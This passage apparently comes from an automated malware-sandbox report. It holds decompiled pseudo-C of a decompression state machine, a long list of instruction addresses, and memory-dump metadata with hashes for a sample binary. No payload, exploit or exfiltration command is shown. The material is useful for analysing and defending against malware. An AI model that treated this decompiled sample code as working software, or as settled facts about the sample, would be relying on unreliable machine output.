														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                        0x00000000
                                                                                        0x0040643a
                                                                                        0x0040643a
                                                                                        0x0040643e
                                                                                        0x00406467
                                                                                        0x00406471
                                                                                        0x00406440
                                                                                        0x00406449
                                                                                        0x00406456
                                                                                        0x00406459
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067ee
                                                                                        0x004067f2
                                                                                        0x004069a1
                                                                                        0x004069b7
                                                                                        0x004069bf
                                                                                        0x004069c6
                                                                                        0x004069c8
                                                                                        0x004069cf
                                                                                        0x004069d3
                                                                                        0x004069d3
                                                                                        0x004067fe
                                                                                        0x00406805
                                                                                        0x0040680d
                                                                                        0x00406810
                                                                                        0x00406813
                                                                                        0x00406813
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fbe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x00000000
                                                                                        0x00405fcf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fd8
                                                                                        0x00405fdb
                                                                                        0x00405fde
                                                                                        0x00405fe2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fe8
                                                                                        0x00405feb
                                                                                        0x00405fed
                                                                                        0x00405fee
                                                                                        0x00405ff1
                                                                                        0x00405ff3
                                                                                        0x00405ff4
                                                                                        0x00405ff6
                                                                                        0x00405ff9
                                                                                        0x00405ffe
                                                                                        0x00406003
                                                                                        0x0040600c
                                                                                        0x0040601f
                                                                                        0x00406022
                                                                                        0x0040602e
                                                                                        0x00406056
                                                                                        0x00406058
                                                                                        0x00406066
                                                                                        0x00406066
                                                                                        0x0040606a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x0040605a
                                                                                        0x0040605d
                                                                                        0x0040605e
                                                                                        0x0040605e
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x00406034
                                                                                        0x00406039
                                                                                        0x00406039
                                                                                        0x00406042
                                                                                        0x0040604a
                                                                                        0x0040604d
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406070
                                                                                        0x00406070
                                                                                        0x00406074
                                                                                        0x00406920
                                                                                        0x00000000
                                                                                        0x00406920
                                                                                        0x0040607d
                                                                                        0x0040608d
                                                                                        0x00406090
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406096
                                                                                        0x0040609a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040609c
                                                                                        0x004060a2
                                                                                        0x004060cc
                                                                                        0x004060d2
                                                                                        0x004060d9
                                                                                        0x00000000
                                                                                        0x004060d9
                                                                                        0x004060a8
                                                                                        0x004060ab
                                                                                        0x004060b0
                                                                                        0x004060b0
                                                                                        0x004060bb
                                                                                        0x004060c3
                                                                                        0x004060c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040610b
                                                                                        0x00406111
                                                                                        0x00406114
                                                                                        0x00406121
                                                                                        0x00406129
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004060e0
                                                                                        0x004060e0
                                                                                        0x004060e4
                                                                                        0x0040692f
                                                                                        0x00000000
                                                                                        0x0040692f
                                                                                        0x004060f0
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fe
                                                                                        0x00406101
                                                                                        0x00406104
                                                                                        0x00406109
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406131
                                                                                        0x00406133
                                                                                        0x00406136
                                                                                        0x004061a7
                                                                                        0x004061aa
                                                                                        0x004061ad
                                                                                        0x004061b4
                                                                                        0x004061be
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00406138
                                                                                        0x0040613c
                                                                                        0x0040613f
                                                                                        0x00406141
                                                                                        0x00406144
                                                                                        0x00406147
                                                                                        0x00406149
                                                                                        0x0040614c
                                                                                        0x0040614e
                                                                                        0x00406153
                                                                                        0x00406156
                                                                                        0x00406159
                                                                                        0x0040615d
                                                                                        0x00406164
                                                                                        0x00406167
                                                                                        0x0040616e
                                                                                        0x00406172
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x0040617e
                                                                                        0x00406181
                                                                                        0x0040619f
                                                                                        0x004061a1
                                                                                        0x00000000
                                                                                        0x00406183
                                                                                        0x00406183
                                                                                        0x00406186
                                                                                        0x00406189
                                                                                        0x0040618c
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x00406191
                                                                                        0x00406194
                                                                                        0x00406196
                                                                                        0x00406197
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x004063d0
                                                                                        0x004063d4
                                                                                        0x004063f2
                                                                                        0x004063f5
                                                                                        0x004063fc
                                                                                        0x004063ff
                                                                                        0x00406402
                                                                                        0x00406405
                                                                                        0x00406408
                                                                                        0x0040640b
                                                                                        0x0040640d
                                                                                        0x00406414
                                                                                        0x00406415
                                                                                        0x00406417
                                                                                        0x0040641a
                                                                                        0x0040641d
                                                                                        0x00406420
                                                                                        0x00406420
                                                                                        0x00406425
                                                                                        0x00000000
                                                                                        0x00406425
                                                                                        0x004063d6
                                                                                        0x004063d9
                                                                                        0x004063dc
                                                                                        0x004063e6
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040647d
                                                                                        0x00406481
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406487
                                                                                        0x0040648b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406491
                                                                                        0x00406493
                                                                                        0x00406497
                                                                                        0x00406497
                                                                                        0x0040649a
                                                                                        0x0040649e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064ee
                                                                                        0x004064f2
                                                                                        0x004064f9
                                                                                        0x004064fc
                                                                                        0x004064ff
                                                                                        0x00406509
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x004064f4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406515
                                                                                        0x00406519
                                                                                        0x00406520
                                                                                        0x00406523
                                                                                        0x00406526
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x00406529
                                                                                        0x0040652c
                                                                                        0x0040652f
                                                                                        0x0040652f
                                                                                        0x00406532
                                                                                        0x00406535
                                                                                        0x00406538
                                                                                        0x00406538
                                                                                        0x0040653b
                                                                                        0x00406542
                                                                                        0x00406547
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004065d5
                                                                                        0x004065d5
                                                                                        0x004065d9
                                                                                        0x00406977
                                                                                        0x00000000
                                                                                        0x00406977
                                                                                        0x004065df
                                                                                        0x004065e2
                                                                                        0x004065e5
                                                                                        0x004065e9
                                                                                        0x004065ec
                                                                                        0x004065f2
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f7
                                                                                        0x004065fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061ca
                                                                                        0x004061ca
                                                                                        0x004061ce
                                                                                        0x0040693b
                                                                                        0x00000000
                                                                                        0x0040693b
                                                                                        0x004061d4
                                                                                        0x004061d7
                                                                                        0x004061da
                                                                                        0x004061de
                                                                                        0x004061e1
                                                                                        0x004061e7
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061ec
                                                                                        0x004061ef
                                                                                        0x004061ef
                                                                                        0x004061f2
                                                                                        0x004061f5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061fb
                                                                                        0x00406201
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406207
                                                                                        0x00406207
                                                                                        0x0040620b
                                                                                        0x0040620e
                                                                                        0x00406211
                                                                                        0x00406214
                                                                                        0x00406217
                                                                                        0x00406218
                                                                                        0x0040621b
                                                                                        0x0040621d
                                                                                        0x00406223
                                                                                        0x00406226
                                                                                        0x00406229
                                                                                        0x0040622c
                                                                                        0x0040622f
                                                                                        0x00406232
                                                                                        0x00406235
                                                                                        0x00406251
                                                                                        0x00406254
                                                                                        0x00406257
                                                                                        0x0040625a
                                                                                        0x00406261
                                                                                        0x00406265
                                                                                        0x00406267
                                                                                        0x0040626b
                                                                                        0x00406237
                                                                                        0x00406237
                                                                                        0x0040623b
                                                                                        0x00406243
                                                                                        0x00406248
                                                                                        0x0040624a
                                                                                        0x0040624c
                                                                                        0x0040624c
                                                                                        0x0040626e
                                                                                        0x00406275
                                                                                        0x00406278
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x00406283
                                                                                        0x00406283
                                                                                        0x00406287
                                                                                        0x00406947
                                                                                        0x00000000
                                                                                        0x00406947
                                                                                        0x0040628d
                                                                                        0x00406290
                                                                                        0x00406293
                                                                                        0x00406297
                                                                                        0x0040629a
                                                                                        0x004062a0
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a5
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062ae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004062b0
                                                                                        0x004062b3
                                                                                        0x004062b6
                                                                                        0x004062b9
                                                                                        0x004062bc
                                                                                        0x004062bf
                                                                                        0x004062c2
                                                                                        0x004062c5
                                                                                        0x004062c8
                                                                                        0x004062cb
                                                                                        0x004062ce
                                                                                        0x004062e6
                                                                                        0x004062e9
                                                                                        0x004062ec
                                                                                        0x004062ef
                                                                                        0x004062ef
                                                                                        0x004062f2
                                                                                        0x004062f6
                                                                                        0x004062f8
                                                                                        0x004062d0
                                                                                        0x004062d0
                                                                                        0x004062d8
                                                                                        0x004062dd
                                                                                        0x004062df
                                                                                        0x004062e1
                                                                                        0x004062e1
                                                                                        0x004062fb
                                                                                        0x00406302
                                                                                        0x00406305
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00406305
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406347
                                                                                        0x00406347
                                                                                        0x0040634b
                                                                                        0x00406953
                                                                                        0x00000000
                                                                                        0x00406953
                                                                                        0x00406351
                                                                                        0x00406354
                                                                                        0x00406357
                                                                                        0x0040635b
                                                                                        0x0040635e
                                                                                        0x00406364
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406369
                                                                                        0x0040636c
                                                                                        0x0040636c
                                                                                        0x00406372
                                                                                        0x00406310
                                                                                        0x00406310
                                                                                        0x00406313
                                                                                        0x00000000
                                                                                        0x00406313
                                                                                        0x00406374
                                                                                        0x00406374
                                                                                        0x00406377
                                                                                        0x0040637a
                                                                                        0x0040637d
                                                                                        0x00406380
                                                                                        0x00406383
                                                                                        0x00406386
                                                                                        0x00406389
                                                                                        0x0040638c
                                                                                        0x0040638f
                                                                                        0x00406392
                                                                                        0x004063aa
                                                                                        0x004063ad
                                                                                        0x004063b0
                                                                                        0x004063b3
                                                                                        0x004063b3
                                                                                        0x004063b6
                                                                                        0x004063ba
                                                                                        0x004063bc
                                                                                        0x00406394
                                                                                        0x00406394
                                                                                        0x0040639c
                                                                                        0x004063a1
                                                                                        0x004063a3
                                                                                        0x004063a5
                                                                                        0x004063a5
                                                                                        0x004063bf
                                                                                        0x004063c6
                                                                                        0x004063c9
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x00406658
                                                                                        0x00406658
                                                                                        0x0040665c
                                                                                        0x00406983
                                                                                        0x00000000
                                                                                        0x00406983
                                                                                        0x00406662
                                                                                        0x00406665
                                                                                        0x00406668
                                                                                        0x0040666c
                                                                                        0x0040666f
                                                                                        0x00406675
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x0040667a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406428
                                                                                        0x00406428
                                                                                        0x0040642b
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x00406767
                                                                                        0x0040676b
                                                                                        0x0040678d
                                                                                        0x00406790
                                                                                        0x0040679a
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040676d
                                                                                        0x00406770
                                                                                        0x00406774
                                                                                        0x00406777
                                                                                        0x00406777
                                                                                        0x0040677a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406824
                                                                                        0x00406828
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x0040684d
                                                                                        0x00406854
                                                                                        0x0040685b
                                                                                        0x0040685b
                                                                                        0x00000000
                                                                                        0x0040685b
                                                                                        0x0040682a
                                                                                        0x0040682d
                                                                                        0x00406830
                                                                                        0x00406833
                                                                                        0x0040683a
                                                                                        0x0040677e
                                                                                        0x0040677e
                                                                                        0x00406781
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406915
                                                                                        0x00406918
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040654f
                                                                                        0x00406551
                                                                                        0x00406558
                                                                                        0x00406559
                                                                                        0x0040655b
                                                                                        0x0040655e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406566
                                                                                        0x00406569
                                                                                        0x0040656c
                                                                                        0x0040656e
                                                                                        0x00406570
                                                                                        0x00406570
                                                                                        0x00406571
                                                                                        0x00406574
                                                                                        0x0040657b
                                                                                        0x0040657e
                                                                                        0x0040658c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406862
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406871
                                                                                        0x00406871
                                                                                        0x00406875
                                                                                        0x004069ad
                                                                                        0x00000000
                                                                                        0x004069ad
                                                                                        0x0040687b
                                                                                        0x0040687e
                                                                                        0x00406881
                                                                                        0x00406885
                                                                                        0x00406888
                                                                                        0x0040688e
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406893
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406899
                                                                                        0x00406899
                                                                                        0x0040689d
                                                                                        0x004068fd
                                                                                        0x00406900
                                                                                        0x00406905
                                                                                        0x00406906
                                                                                        0x00406908
                                                                                        0x0040690a
                                                                                        0x0040690d
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x0040681f
                                                                                        0x00406819
                                                                                        0x0040689f
                                                                                        0x004068a5
                                                                                        0x004068a8
                                                                                        0x004068ab
                                                                                        0x004068ae
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b7
                                                                                        0x004068ba
                                                                                        0x004068bd
                                                                                        0x004068c0
                                                                                        0x004068d9
                                                                                        0x004068dc
                                                                                        0x004068df
                                                                                        0x004068e2
                                                                                        0x004068e6
                                                                                        0x004068e8
                                                                                        0x004068e8
                                                                                        0x004068e9
                                                                                        0x004068ec
                                                                                        0x004068c2
                                                                                        0x004068c2
                                                                                        0x004068ca
                                                                                        0x004068cf
                                                                                        0x004068d1
                                                                                        0x004068d4
                                                                                        0x004068d4
                                                                                        0x004068ef
                                                                                        0x004068f6
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x00406594
                                                                                        0x00406597
                                                                                        0x004065cd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x00406700
                                                                                        0x00406700
                                                                                        0x00406703
                                                                                        0x00406705
                                                                                        0x0040698f
                                                                                        0x00000000
                                                                                        0x0040698f
                                                                                        0x0040670b
                                                                                        0x0040670e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406714
                                                                                        0x00406718
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x00000000
                                                                                        0x0040671b
                                                                                        0x00406599
                                                                                        0x0040659b
                                                                                        0x0040659d
                                                                                        0x0040659f
                                                                                        0x004065a2
                                                                                        0x004065a3
                                                                                        0x004065a5
                                                                                        0x004065a7
                                                                                        0x004065aa
                                                                                        0x004065ad
                                                                                        0x004065c3
                                                                                        0x004065c8
                                                                                        0x00406600
                                                                                        0x00406600
                                                                                        0x00406604
                                                                                        0x00406630
                                                                                        0x00406632
                                                                                        0x00406639
                                                                                        0x0040663c
                                                                                        0x0040663f
                                                                                        0x0040663f
                                                                                        0x00406644
                                                                                        0x00406644
                                                                                        0x00406646
                                                                                        0x00406649
                                                                                        0x00406650
                                                                                        0x00406653
                                                                                        0x00406680
                                                                                        0x00406680
                                                                                        0x00406683
                                                                                        0x00406686
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x00000000
                                                                                        0x004066fa
                                                                                        0x00406688
                                                                                        0x0040668e
                                                                                        0x00406691
                                                                                        0x00406694
                                                                                        0x00406697
                                                                                        0x0040669a
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a3
                                                                                        0x004066a6
                                                                                        0x004066a9
                                                                                        0x004066c2
                                                                                        0x004066c4
                                                                                        0x004066c7
                                                                                        0x004066c8
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066d0
                                                                                        0x004066d2
                                                                                        0x004066d4
                                                                                        0x004066d7
                                                                                        0x004066d9
                                                                                        0x004066dc
                                                                                        0x004066e0
                                                                                        0x004066e2
                                                                                        0x004066e2
                                                                                        0x004066e3
                                                                                        0x004066e6
                                                                                        0x004066e9
                                                                                        0x004066ab
                                                                                        0x004066ab
                                                                                        0x004066b3
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066bd
                                                                                        0x004066bd
                                                                                        0x004066ec
                                                                                        0x004066f3
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f3
                                                                                        0x00406606
                                                                                        0x00406609
                                                                                        0x0040660b
                                                                                        0x0040660e
                                                                                        0x00406611
                                                                                        0x00406614
                                                                                        0x00406616
                                                                                        0x00406619
                                                                                        0x0040661c
                                                                                        0x0040661c
                                                                                        0x0040661f
                                                                                        0x0040661f
                                                                                        0x00406622
                                                                                        0x00406629
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00406629
                                                                                        0x004065af
                                                                                        0x004065b2
                                                                                        0x004065b4
                                                                                        0x004065b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406316
                                                                                        0x00406316
                                                                                        0x0040631a
                                                                                        0x0040695f
                                                                                        0x00000000
                                                                                        0x0040695f
                                                                                        0x00406320
                                                                                        0x00406323
                                                                                        0x00406326
                                                                                        0x00406329
                                                                                        0x0040632c
                                                                                        0x0040632f
                                                                                        0x00406332
                                                                                        0x00406334
                                                                                        0x00406337
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064a1
                                                                                        0x004064a1
                                                                                        0x004064a5
                                                                                        0x0040696b
                                                                                        0x00000000
                                                                                        0x0040696b
                                                                                        0x004064ab
                                                                                        0x004064ae
                                                                                        0x004064b1
                                                                                        0x004064b4
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b9
                                                                                        0x004064bc
                                                                                        0x004064bf
                                                                                        0x004064c2
                                                                                        0x004064c5
                                                                                        0x004064c8
                                                                                        0x004064c9
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064ce
                                                                                        0x004064d1
                                                                                        0x004064d4
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064da
                                                                                        0x004064dc
                                                                                        0x004064dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x00406722
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406728
                                                                                        0x0040672b
                                                                                        0x0040672e
                                                                                        0x00406731
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040673c
                                                                                        0x0040673f
                                                                                        0x00406742
                                                                                        0x00406745
                                                                                        0x00406746
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x0040674b
                                                                                        0x0040674e
                                                                                        0x00406751
                                                                                        0x00406754
                                                                                        0x00406757
                                                                                        0x0040675b
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x004064df
                                                                                        0x004064df
                                                                                        0x00000000
                                                                                        0x004064df
                                                                                        0x00406760
                                                                                        0x00406995
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x004069cc
                                                                                        0x004069cc
                                                                                        0x00000000
                                                                                        0x004069cc
                                                                                        0x00406819
                                                                                        0x004067a0
                                                                                        0x0040679d

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                        • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                        • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                        • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 69%
                                                                                        			E00401389(signed int _a4) {
